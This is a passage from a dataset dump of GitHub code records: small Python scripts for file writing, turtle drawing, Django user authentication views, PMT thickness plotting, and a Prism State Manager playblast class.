(\"james sawyer\", \"HR\", 70000, 1979, True),\n (\"kim kwon\", \"Sales\", 120000, 1986, True),\n (\"sun kwon\", \"IT\", 170000, 1984, False),\n (\"hugo reyes\", \"IT\", 120000, 1992, True)\n]\n\ntry:\n myfile = open(\"employees2.txt\", mode=\"w\")\n for full_name, department, salary, birth_year, full_time in employees:\n myfile.write(f\"{full_name},{salary},{birth_year},{department},\"\n f\"{'FULL_TIME' if full_time else 'PART_TIME'}\\n\") # text i/o\n print(\"Employees are saved to the file\")\nexcept FileNotFoundError as err:\n print(err)\nfinally:\n 
myfile.close()\n","repo_name":"deepcloudlabs/dcl160-2021-jul-05","sub_path":"module07-exceptions.and.files/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9481603090","text":"import turtle\n\n# Define a function to draw a heart\ndef draw_heart(x, y, size):\n    turtle.up()\n    turtle.goto(x, y)\n    turtle.down()\n    turtle.begin_fill()\n    turtle.color('red')\n    turtle.pensize(2)\n    turtle.pencolor('black')\n    turtle.right(45)\n    turtle.forward(size)\n    turtle.circle(size/2, 180)\n    turtle.left(90)\n    turtle.circle(size/2, 180)\n    turtle.forward(size)\n    turtle.end_fill()\n\n# Set up the turtle window and draw a heart\nturtle.setup(width=500, height=500)\nturtle.speed(0)\ndraw_heart(0, 0, 200)\n\n# Keep the turtle window open until manually closed\nturtle.done()","repo_name":"jingyu323/pythons","sub_path":"test/test_basic_grama/study_exam/draw_heart.py","file_name":"draw_heart.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27957652794","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm\nfrom .models import Profile\nfrom django.contrib import messages\nfrom .forms import ProfileForm\n\n# Create your views here.\ndef profile(request):\n    user = Profile.objects.all()\n    context ={'user': user}\n    return render(request,'user/profiles.html',context)\n\ndef loginUser(request):\n\n    page = 'login'\n\n    if request.user.is_authenticated:\n        return redirect('profile')\n\n    if request.method == 'POST':\n        username = request.POST['username']\n        password = request.POST['password']\n\n        try:\n            user = User.objects.get(username=username)\n        except:\n            messages.error(request,'User not found')\n        user = authenticate(request, username=username, password=password)\n\n        if user is not None:\n            login(request, user)\n            return redirect('home')\n        else:\n            messages.error(request,'Username or password is incorrect')\n    return render(request,'user/login_register.html',)\n\ndef logoutUser(request):\n    logout(request)\n    messages.info(request,'User successfully logged out')\n    return redirect('login')\n\ndef registerUser(request):\n    page = 'register'\n    form = UserCreationForm()\n    if request.method == 'POST':\n        form = UserCreationForm(request.POST)\n        if form.is_valid():\n            user=form.save(commit=False)\n            user.username = user.username.lower()\n            user.save()\n\n            messages.success(request,'User created successfully')\n            login(request,user)\n            return redirect('home')\n\n        else:\n            messages.error(request,'An error occurred')\n    context={'page': page, 'form': form}\n    return render(request,'user/login_register.html',context)\n\n\n@login_required(login_url='login')\ndef editAccount(request):\n    profile = request.user.profile\n    form = ProfileForm(instance=profile)\n    name = profile.user.username\n    print(name)\n\n    if request.method == 'POST':\n        form = ProfileForm(request.POST, request.FILES, instance=profile)\n        if form.is_valid():\n            form.save()\n            return redirect('profile')\n    context ={'form' : form}\n    return 
render(request,'user/profile_form.html',context)","repo_name":"ayushsaxenagithub/candiresume","sub_path":"user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"27814203256","text":"import csv\nimport numpy as np\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm\nfrom scipy.optimize import curve_fit\n\n\ndef thickness_plots(pmt_num):\n data_path = Path(r'/Users/Eliza/Documents/WATCHMAN/PMT Testing/thickness_measurements')\n\n base_array = np.empty([7, 12])\n above_array = np.empty([7, 12])\n below_array = np.empty([7, 12])\n extra_array = np.empty([20])\n mean_base_array = np.empty([2, 12])\n mean_above_array = np.empty([2, 12])\n mean_below_array = np.empty([2, 12])\n\n if pmt_num == 3:\n # Reads PMT Data (mm)\n myfile = open(data_path / str('pmt_' + str(pmt_num) + '_below.csv'), 'r') # Opens file with 1 cm below data\n csv_reader = csv.reader(myfile)\n row_num = -1\n for row in csv_reader: # Creates array with 1 cm below data\n if row_num >= 0:\n for i in range(7):\n below_array[i, row_num] = float(row[i])\n row_num += 1\n myfile.close()\n myfile = open(data_path / str('pmt_' + str(pmt_num) + '_extra.csv'), 'r') # Opens file with extra point 1 data\n csv_reader = csv.reader(myfile)\n row_num = -1\n for row in csv_reader: # Creates array with extra point 1 data\n if row_num >= 0:\n extra_array[row_num] = float(row[0])\n row_num += 1\n myfile.close()\n\n # Calculates mean value for each measurement point\n mean_below_array[0, :] = below_array[0, :]\n for i in range(12):\n mean_below_array[1, i] = np.mean(below_array[1:7, i])\n\n error_below = np.std(mean_below_array[1, :]) / np.sqrt(len(mean_below_array[1, :]))\n dispersion_below = error_below / np.mean(mean_below_array[1, :])\n dispersion_below = format(dispersion_below * 100, '.2f')\n\n else:\n # Reads PMT Data (mm)\n myfile = open(data_path / str('pmt_' + str(pmt_num) + '_base.csv'), 'r') # Opens file with base of neck data\n csv_reader = csv.reader(myfile)\n row_num = -1\n for row in csv_reader: # Creates array with base of neck data\n if row_num >= 0:\n for i in range(7):\n base_array[i, row_num] = float(row[i])\n row_num += 1\n myfile.close()\n myfile = open(data_path / str('pmt_' + str(pmt_num) + '_above.csv'), 'r') # Opens file with 1 cm above data\n csv_reader = csv.reader(myfile)\n row_num = -1\n for row in csv_reader: # Creates array with 1 cm above data\n if row_num >= 0:\n for i in range(7):\n above_array[i, row_num] = float(row[i])\n row_num += 1\n myfile.close()\n myfile = open(data_path / str('pmt_' + str(pmt_num) + '_below.csv'), 'r') # Opens file with 1 cm below data\n csv_reader = csv.reader(myfile)\n row_num = -1\n for row in csv_reader: # Creates array with 1 cm below data\n if row_num >= 0:\n for i in range(7):\n below_array[i, row_num] = float(row[i])\n row_num += 1\n myfile.close()\n myfile = open(data_path / str('pmt_' + str(pmt_num) + '_extra.csv'), 'r') # Opens file with extra point 1 data\n csv_reader = csv.reader(myfile)\n row_num = -1\n for row in csv_reader: # Creates array with extra point 1 data\n if row_num >= 0:\n extra_array[row_num] = float(row[0])\n row_num += 1\n myfile.close()\n\n # Calculates mean value for each measurement point\n mean_base_array[0, :] = base_array[0, :]\n for i in range(12):\n mean_base_array[1, i] = np.mean(base_array[1:7, i])\n\n mean_above_array[0, :] = above_array[0, :]\n for i in range(12):\n 
mean_above_array[1, i] = np.mean(above_array[1:7, i])\n\n mean_below_array[0, :] = below_array[0, :]\n for i in range(12):\n mean_below_array[1, i] = np.mean(below_array[1:7, i])\n\n error_base = np.std(mean_base_array[1, :]) / np.sqrt(len(mean_base_array[1, :]))\n dispersion_base = error_base / np.mean(mean_base_array[1, :])\n dispersion_base = format(dispersion_base * 100, '.2f')\n\n error_above = np.std(mean_above_array[1, :]) / np.sqrt(len(mean_above_array[1, :]))\n dispersion_above = error_above / np.mean(mean_above_array[1, :])\n dispersion_above = format(dispersion_above * 100, '.2f')\n\n error_below = np.std(mean_below_array[1, :]) / np.sqrt(len(mean_below_array[1, :]))\n dispersion_below = error_below / np.mean(mean_below_array[1, :])\n dispersion_below = format(dispersion_below * 100, '.2f')\n\n # Creates plots\n def func(m, a, b, c): # Defines Gaussian function (a is amplitude, b is mean, c is standard deviation)\n return a * np.exp(-(m - b) ** 2.0 / (2 * c ** 2))\n\n n, bins, patches = plt.hist(extra_array, 7) # Plots histogram\n b_est, c_est = norm.fit(extra_array) # Calculates mean & standard deviation based on entire array\n bins = np.delete(bins, len(bins) - 1)\n bins_diff = bins[1] - bins[0]\n bins = np.linspace(bins[0] + bins_diff / 2, bins[len(bins) - 1] + bins_diff / 2, len(bins))\n bins_range = np.linspace(bins[0], bins[len(bins) - 1], 10000) # Creates array of bins\n n_range = np.interp(bins_range, bins, n) # Interpolates & creates array of y axis values\n guess = [1, float(b_est), float(c_est)] # Defines guess for values of a, b & c in Gaussian fit\n popt, pcov = curve_fit(func, bins_range, n_range, p0=guess, maxfev=5000) # Finds Gaussian fit\n mu = float(format(popt[1], '.2e')) # Calculates mean\n sd = np.abs(float(format(popt[2], '.2e'))) # Calculates standard deviation\n plt.plot(bins_range, func(bins_range, *popt)) # Plots Gaussian fit\n sum_val = 0\n num = 0\n for item in extra_array:\n sum_val += (item - mu)**2\n num += 1\n sigma = np.sqrt(sum_val / num)\n sigma = float(format(sigma, '.2e'))\n plt.xlabel('Thickness (mm)')\n plt.title('PMT ' + str(pmt_num) + ' Thickness at Point 1\\n mean: ' + str(mu) + ' mm' + ', SD: ' + str(sd) + ' mm' +\n ', sigma: ' + str(sigma) + ' mm')\n plt.savefig(Path(r'/Users/Eliza/Documents/WATCHMAN/PMT Testing/thickness_plots/pmt_' + str(pmt_num) +\n '_point_1.png'), dpi=360)\n plt.close()\n\n if pmt_num == 1:\n x_pt = 200\n y_pt = 4.3\n elif pmt_num == 2:\n x_pt = 25\n y_pt = 3\n else:\n x_pt = 200\n y_pt = 3.4\n\n if pmt_num == 3:\n plt.plot(mean_below_array[0, :], mean_below_array[1, :], 'green')\n plt.errorbar(mean_below_array[0, :], mean_below_array[1, :], sigma)\n plt.xlabel('Azimuthal Angle (degrees)')\n plt.ylabel('Thickness (mm)')\n plt.title('PMT ' + str(pmt_num) + ' Thickness (1 cm Below Base of Neck)')\n plt.text(x_pt, y_pt, str('Dispersion:\\n1 cm Below - ' + str(dispersion_below) + '%'), verticalalignment='top',\n bbox=dict(alpha=0.5, facecolor='none'))\n plt.savefig(Path(r'/Users/Eliza/Documents/WATCHMAN/PMT Testing/thickness_plots/pmt_' + str(pmt_num) +\n '_thicknesses.png'), dpi=360)\n plt.close()\n else:\n x, = plt.plot(mean_base_array[0, :], mean_base_array[1, :], 'blue')\n plt.errorbar(mean_base_array[0, :], mean_base_array[1, :], sigma)\n y, = plt.plot(mean_above_array[0, :], mean_above_array[1, :], 'orange')\n plt.errorbar(mean_above_array[0, :], mean_above_array[1, :], sigma)\n z, = plt.plot(mean_below_array[0, :], mean_below_array[1, :], 'green')\n plt.errorbar(mean_below_array[0, :], mean_below_array[1, :], 
sigma)\n plt.legend((x, y, z), ('Base of Neck', '1 cm Above Base of Neck', '1 cm Below Base of Neck'))\n plt.xlabel('Azimuthal Angle (degrees)')\n plt.ylabel('Thickness (mm)')\n plt.title('PMT ' + str(pmt_num) + ' Thicknesses')\n plt.text(x_pt, y_pt, str('Dispersion:\\nBase - ' + str(dispersion_base) + '%\\n1 cm Above - ' +\n str(dispersion_above) + '%\\n1 cm Below - ' + str(dispersion_below) + '%'),\n verticalalignment='top', bbox=dict(alpha=0.5, facecolor='none'))\n plt.savefig(Path(r'/Users/Eliza/Documents/WATCHMAN/PMT Testing/thickness_plots/pmt_' + str(pmt_num) +\n '_thicknesses.png'), dpi=360)\n plt.close()\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(prog=\"thickness_plots\", description=\"Creates plots of PMT thickness measurements\")\n parser.add_argument(\"--pmt_num\", type=int, help='number of PMT (default=1)', default=1)\n args = parser.parse_args()\n\n thickness_plots(args.pmt_num)\n","repo_name":"eneights/pmt_tests","sub_path":"pmt_thickness_measurement.py","file_name":"pmt_thickness_measurement.py","file_ext":"py","file_size_in_byte":9130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12231619680","text":"import os\nimport sys\nimport time\nimport traceback\nimport platform\nimport logging\n\ntry:\n from PySide2.QtCore import *\n from PySide2.QtGui import *\n from PySide2.QtWidgets import *\n\n psVersion = 2\nexcept:\n from PySide.QtCore import *\n from PySide.QtGui import *\n\n psVersion = 1\n\nif sys.version[0] == \"3\":\n pVersion = 3\nelse:\n pVersion = 2\n\nfrom PrismUtils.Decorators import err_catcher\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass PlayblastClass(object):\n className = \"Playblast\"\n listType = \"Export\"\n\n @err_catcher(name=__name__)\n def setup(self, state, core, stateManager, stateData=None):\n self.state = state\n self.core = core\n self.stateManager = stateManager\n\n self.curCam = None\n self.e_name.setText(state.text(0))\n\n self.l_name.setVisible(False)\n self.e_name.setVisible(False)\n\n self.camlist = []\n\n self.rangeTypes = [\"State Manager\", \"Scene\", \"Shot\", \"Single Frame\", \"Custom\"]\n self.cb_rangeType.addItems(self.rangeTypes)\n for idx, rtype in enumerate(self.rangeTypes):\n self.cb_rangeType.setItemData(idx, self.stateManager.getFrameRangeTypeToolTip(rtype), Qt.ToolTipRole)\n\n dftResPresets = [\n \"3840x2160\",\n \"1920x1080\",\n \"1280x720\",\n \"960x540\",\n \"640x360\",\n \"Get from rendersettings\",\n ]\n\n self.resolutionPresets = self.core.getConfig(\"globals\", \"resolutionPresets\", configPath=self.core.prismIni, dft=dftResPresets)\n\n if \"Get from rendersettings\" not in self.resolutionPresets:\n self.resolutionPresets.append(\"Get from rendersettings\")\n\n self.outputformats = [\".jpg\", \".mp4\"]\n self.cb_formats.addItems(self.outputformats)\n getattr(self.core.appPlugin, \"sm_playblast_startup\", lambda x: None)(self)\n self.connectEvents()\n\n self.oldPalette = self.b_changeTask.palette()\n self.warnPalette = QPalette()\n self.warnPalette.setColor(QPalette.Button, QColor(200, 0, 0))\n self.warnPalette.setColor(QPalette.ButtonText, QColor(255, 255, 255))\n\n self.setTaskWarn(True)\n\n self.f_localOutput.setVisible(self.core.useLocalFiles)\n\n self.updateUi()\n if stateData is not None:\n self.loadData(stateData)\n else:\n fileName = self.core.getCurrentFileName()\n fnameData = self.core.getScenefileData(fileName)\n if fnameData.get(\"category\"):\n 
self.l_taskName.setText(fnameData.get(\"category\"))\n\n @err_catcher(name=__name__)\n def loadData(self, data):\n if \"statename\" in data:\n self.e_name.setText(data[\"statename\"])\n if \"taskname\" in data:\n self.l_taskName.setText(data[\"taskname\"])\n if data[\"taskname\"] != \"\":\n self.setTaskWarn(False)\n self.nameChanged(self.e_name.text())\n if \"rangeType\" in data:\n idx = self.cb_rangeType.findText(data[\"rangeType\"])\n if idx != -1:\n self.cb_rangeType.setCurrentIndex(idx)\n self.updateRange()\n if \"startframe\" in data:\n self.sp_rangeStart.setValue(int(data[\"startframe\"]))\n if \"endframe\" in data:\n self.sp_rangeEnd.setValue(int(data[\"endframe\"]))\n if \"currentcam\" in data:\n camName = getattr(self.core.appPlugin, \"getCamName\", lambda x, y: \"\")(\n self, data[\"currentcam\"]\n )\n idx = self.cb_cams.findText(camName)\n if idx > 0:\n self.curCam = self.camlist[idx - 1]\n self.cb_cams.setCurrentIndex(idx)\n self.stateManager.saveStatesToScene()\n if \"resoverride\" in data:\n res = eval(data[\"resoverride\"])\n self.chb_resOverride.setChecked(res[0])\n self.sp_resWidth.setValue(res[1])\n self.sp_resHeight.setValue(res[2])\n if \"localoutput\" in data:\n self.chb_localOutput.setChecked(eval(data[\"localoutput\"]))\n if \"outputformat\" in data:\n idx = self.cb_formats.findText(data[\"outputformat\"])\n if idx > 0:\n self.cb_formats.setCurrentIndex(idx)\n if \"lastexportpath\" in data:\n lePath = self.core.fixPath(data[\"lastexportpath\"])\n self.l_pathLast.setText(lePath)\n self.l_pathLast.setToolTip(lePath)\n pathIsNone = self.l_pathLast.text() == \"None\"\n self.b_openLast.setEnabled(not pathIsNone)\n self.b_copyLast.setEnabled(not pathIsNone)\n if \"stateenabled\" in data:\n self.state.setCheckState(\n 0,\n eval(\n data[\"stateenabled\"]\n .replace(\"PySide.QtCore.\", \"\")\n .replace(\"PySide2.QtCore.\", \"\")\n ),\n )\n\n getattr(self.core.appPlugin, \"sm_playblast_loadData\", lambda x, y: None)(\n self, data\n )\n\n @err_catcher(name=__name__)\n def connectEvents(self):\n self.e_name.textChanged.connect(self.nameChanged)\n self.e_name.editingFinished.connect(self.stateManager.saveStatesToScene)\n self.b_changeTask.clicked.connect(self.changeTask)\n self.cb_rangeType.activated.connect(self.rangeTypeChanged)\n self.sp_rangeStart.editingFinished.connect(self.startChanged)\n self.sp_rangeEnd.editingFinished.connect(self.endChanged)\n self.cb_cams.activated.connect(self.setCam)\n self.chb_resOverride.stateChanged.connect(self.resOverrideChanged)\n self.sp_resWidth.editingFinished.connect(self.stateManager.saveStatesToScene)\n self.sp_resHeight.editingFinished.connect(self.stateManager.saveStatesToScene)\n self.b_resPresets.clicked.connect(self.showResPresets)\n self.chb_localOutput.stateChanged.connect(self.stateManager.saveStatesToScene)\n self.cb_formats.activated.connect(self.stateManager.saveStatesToScene)\n self.b_openLast.clicked.connect(\n lambda: self.core.openFolder(os.path.dirname(self.l_pathLast.text()))\n )\n self.b_copyLast.clicked.connect(\n lambda: self.core.copyToClipboard(self.l_pathLast.text())\n )\n\n @err_catcher(name=__name__)\n def rangeTypeChanged(self, state):\n self.updateRange()\n self.stateManager.saveStatesToScene()\n\n @err_catcher(name=__name__)\n def startChanged(self):\n if self.sp_rangeStart.value() > self.sp_rangeEnd.value():\n self.sp_rangeEnd.setValue(self.sp_rangeStart.value())\n\n self.stateManager.saveStatesToScene()\n\n @err_catcher(name=__name__)\n def endChanged(self):\n if self.sp_rangeEnd.value() < 
self.sp_rangeStart.value():\n self.sp_rangeStart.setValue(self.sp_rangeEnd.value())\n\n self.stateManager.saveStatesToScene()\n\n @err_catcher(name=__name__)\n def setCam(self, index):\n if index == 0:\n self.curCam = None\n else:\n self.curCam = self.camlist[index - 1]\n\n self.stateManager.saveStatesToScene()\n\n @err_catcher(name=__name__)\n def nameChanged(self, text):\n taskname = self.l_taskName.text()\n if taskname == \"\":\n taskname = \"None\"\n\n sText = text + \" (%s)\" % taskname\n if self.state.text(0).endswith(\" - disabled\"):\n sText += \" - disabled\"\n\n self.state.setText(0, sText)\n\n @err_catcher(name=__name__)\n def setTaskname(self, taskname):\n self.l_taskName.setText(taskname)\n self.updateUi()\n\n @err_catcher(name=__name__)\n def changeTask(self):\n import CreateItem\n\n self.nameWin = CreateItem.CreateItem(\n startText=self.l_taskName.text(),\n showTasks=True,\n taskType=\"playblast\",\n core=self.core,\n )\n self.core.parentWindow(self.nameWin)\n self.nameWin.setWindowTitle(\"Change Taskname\")\n self.nameWin.l_item.setText(\"Taskname:\")\n self.nameWin.buttonBox.buttons()[0].setText(\"Ok\")\n self.nameWin.e_item.selectAll()\n result = self.nameWin.exec_()\n\n if result == 1:\n self.l_taskName.setText(self.nameWin.e_item.text())\n self.nameChanged(self.e_name.text())\n\n self.setTaskWarn(False)\n\n self.stateManager.saveStatesToScene()\n\n @err_catcher(name=__name__)\n def resOverrideChanged(self, checked):\n self.sp_resWidth.setEnabled(checked)\n self.sp_resHeight.setEnabled(checked)\n self.b_resPresets.setEnabled(checked)\n\n self.stateManager.saveStatesToScene()\n\n @err_catcher(name=__name__)\n def showResPresets(self):\n pmenu = QMenu(self.stateManager)\n\n for preset in self.resolutionPresets:\n pAct = QAction(preset, self)\n res = self.getResolution(preset)\n if not res:\n continue\n\n pwidth, pheight = res\n\n pAct.triggered.connect(\n lambda x=None, v=pwidth: self.sp_resWidth.setValue(v)\n )\n pAct.triggered.connect(\n lambda x=None, v=pheight: self.sp_resHeight.setValue(v)\n )\n pAct.triggered.connect(lambda: self.stateManager.saveStatesToScene())\n pmenu.addAction(pAct)\n\n pmenu.exec_(QCursor.pos())\n\n @err_catcher(name=__name__)\n def getResolution(self, resolution):\n res = None\n if resolution == \"Get from rendersettings\":\n res = self.core.appPlugin.getResolution()\n else:\n try:\n pwidth = int(resolution.split(\"x\")[0])\n pheight = int(resolution.split(\"x\")[1])\n res = [pwidth, pheight]\n except:\n res = getattr(self.core.appPlugin, \"evaluateResolution\", lambda x: None)(resolution)\n\n return res\n\n @err_catcher(name=__name__)\n def updateUi(self):\n # update Cams\n self.cb_cams.clear()\n self.cb_cams.addItem(\"Don't override\")\n self.camlist = camNames = []\n\n if not self.stateManager.standalone:\n self.camlist = self.core.appPlugin.getCamNodes(self)\n camNames = [self.core.appPlugin.getCamName(self, i) for i in self.camlist]\n\n self.cb_cams.addItems(camNames)\n\n if self.curCam in self.camlist:\n self.cb_cams.setCurrentIndex(self.camlist.index(self.curCam) + 1)\n else:\n self.cb_cams.setCurrentIndex(0)\n self.curCam = None\n\n self.updateRange()\n\n if self.l_taskName.text() != \"\":\n self.setTaskWarn(False)\n\n self.nameChanged(self.e_name.text())\n\n return True\n\n @err_catcher(name=__name__)\n def updateRange(self):\n rangeType = self.cb_rangeType.currentText()\n isCustom = rangeType == \"Custom\"\n self.l_rangeStart.setVisible(not isCustom)\n self.l_rangeEnd.setVisible(not isCustom)\n 
self.sp_rangeStart.setVisible(isCustom)\n self.sp_rangeEnd.setVisible(isCustom)\n\n if not isCustom:\n frange = self.getFrameRange(rangeType=rangeType)\n start = str(int(frange[0])) if frange[0] is not None else \"-\"\n end = str(int(frange[1])) if frange[1] is not None else \"-\"\n self.l_rangeStart.setText(start)\n self.l_rangeEnd.setText(end)\n\n @err_catcher(name=__name__)\n def getFrameRange(self, rangeType):\n startFrame = None\n endFrame = None\n if rangeType == \"State Manager\":\n startFrame = self.stateManager.sp_rangeStart.value()\n endFrame = self.stateManager.sp_rangeEnd.value()\n elif rangeType == \"Scene\":\n startFrame, endFrame = self.core.appPlugin.getFrameRange(self)\n elif rangeType == \"Shot\":\n fileName = self.core.getCurrentFileName()\n fnameData = self.core.getScenefileData(fileName)\n if fnameData[\"entity\"] == \"shot\":\n frange = self.core.entities.getShotRange(fnameData[\"entityName\"])\n if frange:\n startFrame, endFrame = frange\n elif rangeType == \"Single Frame\":\n startFrame = self.core.appPlugin.getCurrentFrame()\n elif rangeType == \"Custom\":\n startFrame = self.sp_rangeStart.value()\n endFrame = self.sp_rangeEnd.value()\n\n if startFrame is not None:\n startFrame = int(startFrame)\n\n if endFrame is not None:\n endFrame = int(endFrame)\n\n return startFrame, endFrame\n\n @err_catcher(name=__name__)\n def updateLastPath(self, path):\n self.l_pathLast.setText(path)\n self.l_pathLast.setToolTip(path)\n self.b_openLast.setEnabled(True)\n self.b_copyLast.setEnabled(True)\n\n @err_catcher(name=__name__)\n def preExecuteState(self):\n warnings = []\n\n if self.l_taskName.text() == \"\":\n warnings.append([\"No taskname is given.\", \"\", 3])\n\n rangeType = self.cb_rangeType.currentText()\n startFrame, endFrame = self.getFrameRange(rangeType)\n\n if startFrame is None:\n warnings.append([\"Framerange is invalid.\", \"\", 3])\n\n warnings += self.core.appPlugin.sm_playblast_preExecute(self)\n\n return [self.state.text(0), warnings]\n\n @err_catcher(name=__name__)\n def getOutputName(self, useVersion=\"next\", extension=None):\n if self.l_taskName.text() == \"\":\n return\n\n task = self.l_taskName.text()\n extension = extension or self.cb_formats.currentText()\n fileName = self.core.getCurrentFileName()\n fnameData = self.core.getScenefileData(fileName)\n framePadding = \".\" if self.cb_rangeType.currentText() != \"Single Frame\" else \"\"\n\n if \"entityName\" not in fnameData:\n return\n\n location = \"global\"\n if (\n self.core.useLocalFiles\n and self.chb_localOutput.isChecked()\n ):\n location = \"local\"\n\n if fnameData[\"entity\"] == \"asset\":\n assetPath = self.core.getEntityBasePath(fileName)\n entityName = self.core.entities.getAssetRelPathFromPath(assetPath)\n else:\n entityName = fnameData[\"entityName\"]\n\n outputPath = self.core.mediaProducts.generatePlayblastPath(\n entity=fnameData[\"entity\"],\n entityName=entityName,\n task=task,\n extension=extension,\n framePadding=framePadding,\n comment=fnameData[\"comment\"],\n version=useVersion if useVersion != \"next\" else None,\n location=location\n )\n\n outputPath = outputPath.replace(\"\\\\\", \"/\")\n outputFolder = os.path.dirname(outputPath)\n hVersion = self.core.mediaProducts.getVersionFromPlayblastFilepath(outputPath)\n\n return outputPath, outputFolder, hVersion\n\n @err_catcher(name=__name__)\n def executeState(self, parent, useVersion=\"next\"):\n # \tif not self.core.uiAvailable:\n # \t\treturn [self.state.text(0) + \": error - Playblasts are not supported without UI.\"]\n\n if 
self.l_taskName.text() == \"\":\n            return [\n                self.state.text(0)\n                + \": error - No taskname is given. Skipped the activation of this state.\"\n            ]\n\n        fileName = self.core.getCurrentFileName()\n\n        result = self.getOutputName(useVersion=useVersion, extension=\".jpg\")\n        if not result:\n            return [\n                self.state.text(0)\n                + \": error - Couldn't generate an outputpath for this state.\\nMake sure your scenefile is saved correctly in the pipeline.\"\n            ]\n\n        outputName, outputPath, hVersion = result\n\n        outLength = len(outputName)\n        if platform.system() == \"Windows\" and outLength > 255:\n            return [\n                self.state.text(0)\n                + \" - error - The outputpath is longer than 255 characters (%s), which is not supported on Windows. Please shorten the outputpath by changing the comment, taskname or projectpath.\"\n                % outLength\n            ]\n\n        rangeType = self.cb_rangeType.currentText()\n        startFrame, endFrame = self.getFrameRange(rangeType)\n        if startFrame is None:\n            return [self.state.text(0) + \": error - Framerange is invalid\"]\n\n        if rangeType == \"Single Frame\":\n            endFrame = startFrame\n\n        jobFrames = [startFrame, endFrame]\n\n        exCheck = self.core.appPlugin.sm_playblast_execute(self)\n        if exCheck is not None:\n            return exCheck\n\n        if self.curCam is not None and not self.core.appPlugin.isNodeValid(\n            self, self.curCam\n        ):\n            return [\n                self.state.text(0) + \": error - Camera is invalid (%s).\" % self.curCam\n            ]\n\n        kwargs = {\n            \"state\": self,\n            \"scenefile\": fileName,\n            \"startframe\": jobFrames[0],\n            \"endframe\": jobFrames[1],\n            \"outputpath\": outputName,\n        }\n        result = self.core.callback(\"prePlayblast\", **kwargs)\n\n        for res in result:\n            if res and \"outputName\" in res:\n                outputName = res[\"outputName\"]\n\n        outputPath = os.path.dirname(outputName)\n        if not os.path.exists(outputPath):\n            os.makedirs(outputPath)\n\n        self.core.saveVersionInfo(\n            location=outputPath, version=hVersion, origin=fileName\n        )\n\n        self.updateLastPath(outputName)\n        self.stateManager.saveStatesToScene()\n\n        self.core.saveScene(versionUp=False, prismReq=False)\n\n        try:\n            self.core.appPlugin.sm_playblast_createPlayblast(\n                self, jobFrames=jobFrames, outputName=outputName\n            )\n\n            getattr(self.core.appPlugin, \"sm_playblast_postExecute\", lambda x: None)(\n                self\n            )\n\n            if self.cb_formats.currentText() == \".mp4\":\n                mediaBaseName = os.path.splitext(outputName)[0]\n                videoOutput = mediaBaseName + \"mp4\"\n                inputpath = (\n                    os.path.splitext(outputName)[0]\n                    + \"%04d\".replace(\"4\", str(self.core.framePadding))\n                    + os.path.splitext(outputName)[1]\n                )\n                result = self.core.media.convertMedia(inputpath, jobFrames[0], videoOutput)\n\n                if not os.path.exists(videoOutput):\n                    logger.warning(\"ffmpeg output: %s\" % str(result))\n                    return [\n                        self.state.text(0)\n                        + \" - error occurred during conversion of jpg files to mp4. 
Check the console for more information.\"\n ]\n\n delFiles = []\n for i in os.listdir(outputPath):\n if i.startswith(os.path.basename(mediaBaseName)) and i.endswith(\n \".jpg\"\n ):\n delFiles.append(os.path.join(outputPath, i))\n\n for i in delFiles:\n try:\n os.remove(i)\n except:\n pass\n\n self.updateLastPath(videoOutput)\n\n kwargs = {\n \"state\": self,\n \"scenefile\": fileName,\n \"startframe\": jobFrames[0],\n \"endframe\": jobFrames[1],\n \"outputpath\": outputName,\n }\n result = self.core.callback(\"postPlayblast\", **kwargs)\n\n for res in result:\n if res and \"outputName\" in res:\n outputPath = os.path.dirname(res[\"outputName\"])\n\n if len(os.listdir(outputPath)) > 1:\n return [self.state.text(0) + \" - success\"]\n else:\n return [self.state.text(0) + \" - unknown error (files do not exist)\"]\n except Exception as e:\n exc_type, exc_obj, exc_tb = sys.exc_info()\n erStr = \"%s ERROR - sm_default_playblast %s:\\n%s\" % (\n time.strftime(\"%d/%m/%y %X\"),\n self.core.version,\n traceback.format_exc(),\n )\n self.core.writeErrorLog(erStr)\n return [\n self.state.text(0)\n + \" - unknown error (view console for more information)\"\n ]\n\n @err_catcher(name=__name__)\n def setTaskWarn(self, warn):\n useSS = getattr(self.core.appPlugin, \"colorButtonWithStyleSheet\", False)\n if warn:\n if useSS:\n self.b_changeTask.setStyleSheet(\n \"QPushButton { background-color: rgb(200,0,0); }\"\n )\n else:\n self.b_changeTask.setPalette(self.warnPalette)\n else:\n if useSS:\n self.b_changeTask.setStyleSheet(\"\")\n else:\n self.b_changeTask.setPalette(self.oldPalette)\n\n @err_catcher(name=__name__)\n def getStateProps(self):\n stateProps = {}\n stateProps.update(\n getattr(self.core.appPlugin, \"sm_playblast_getStateProps\", lambda x: {})(\n self\n )\n )\n stateProps.update(\n {\n \"statename\": self.e_name.text(),\n \"taskname\": self.l_taskName.text(),\n \"rangeType\": str(self.cb_rangeType.currentText()),\n \"startframe\": self.sp_rangeStart.value(),\n \"endframe\": self.sp_rangeEnd.value(),\n \"currentcam\": str(self.curCam),\n \"resoverride\": str(\n [\n self.chb_resOverride.isChecked(),\n self.sp_resWidth.value(),\n self.sp_resHeight.value(),\n ]\n ),\n \"localoutput\": str(self.chb_localOutput.isChecked()),\n \"lastexportpath\": self.l_pathLast.text().replace(\"\\\\\", \"/\"),\n \"stateenabled\": str(self.state.checkState(0)),\n \"outputformat\": str(self.cb_formats.currentText()),\n }\n )\n return stateProps\n","repo_name":"RichardFrangenberg/Prism","sub_path":"Prism/Scripts/ProjectScripts/StateManagerNodes/default_Playblast.py","file_name":"default_Playblast.py","file_ext":"py","file_size_in_byte":22064,"program_lang":"python","lang":"en","doc_type":"code","stars":267,"dataset":"github-code","pt":"52"} +{"seq_id":"2055069745","text":"import math\r\nif __name__ == '__main__':\r\n outcomes 